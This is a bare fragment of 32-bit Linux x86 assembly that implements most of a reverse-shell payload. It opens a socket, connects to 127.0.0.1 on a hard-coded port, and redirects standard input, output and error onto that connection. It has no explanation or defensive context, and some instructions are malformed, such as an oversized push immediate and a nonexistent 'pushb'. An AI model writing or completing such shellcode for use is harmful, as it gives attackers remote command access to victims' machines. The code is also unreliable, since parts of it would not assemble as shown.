  #socket
  movl $102, %eax
  movl $1, %ebx
  push $0
  push $0
  push $1
  push $2
  movl %esp,%ecx
  int $0x80
  movl %eax, %esi   

#connect
 pushl $0x0100007F00 #127.0.0.1
  movw $0x697a , %dx
 pushw %dx    
 movw $2, %dx
 pushw %dx            
 movl %esp, %ecx

 movb $16, %dl
 pushb %dl
 
 push %ecx
 push %esi
 movl $3,%ebx
 movl $102, %eax
 movl %esp, %ecx
 int $0x80
//calls socket

#dup2 for stdin, stdout and stderr
movl $63, %eax
movl %esi, %ebx
movl $0, %ecx
int $0x80

movl $63, %eax
movl %esi, %ebx
movl $1, %ecx
int $0x80


movl $63, %eax
movl %esi, %ebx
movl $2, %ecx
int $0x80